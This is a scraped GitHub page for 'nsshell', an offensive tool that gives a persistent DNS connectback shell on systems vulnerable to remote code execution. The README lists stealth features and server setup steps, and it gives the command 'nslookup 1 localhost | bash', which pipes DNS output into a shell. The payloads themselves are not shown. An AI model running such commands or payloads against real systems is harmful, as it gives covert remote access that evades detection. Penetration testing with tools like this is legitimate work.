Skip to content
/ nsshell Public

A DNS connectback shell executed by strings in payloads.txt

License

GPL-3.0 license
101 stars 19 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

TheRook/nsshell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
nsshell
nsshell
 
 
scripts
scripts
 
 
test
test
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
icon.png
icon.png
 
 
nsshell.py
nsshell.py
 
 
requirements.txt
requirements.txt
 
 
setup.py
setup.py
 
 

Repository files navigation

Think sqlmap meets xsshunter - but looking for (blind/nonblind) RCE to get a DNS connectback shell.

  • persistent shell (even if you exit nsshell.py)
  • doesn't touch disk
  • resumes access when you restart nsshell.py
  • nothing to install or compile for the target
  • the target can use their own trusted DNS resolver - or automatically upgrade to a direct connection for speed

Start: The tool needs to know which domain it has control over:

sudo ./nsshell.py host.com 123.123.123.112

wrote connectback payloads to:payloads.txt

The file above contains a list of auto-pwns. Run one of the payloads and a persistent shell will be loaded over DNS.

install

sudo make install

Run Server - localhost for testing

sudo python nsshell.py localhost 127.0.0.1

Spawn Connectback shell - localhost for testing

nslookup 1 localhost | bash

That's all folks!

About

A DNS connectback shell executed by strings in payloads.txt

Resources

Readme

License

GPL-3.0 license
Activity

Stars

101 stars

Watchers

6 watching

Forks

19 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages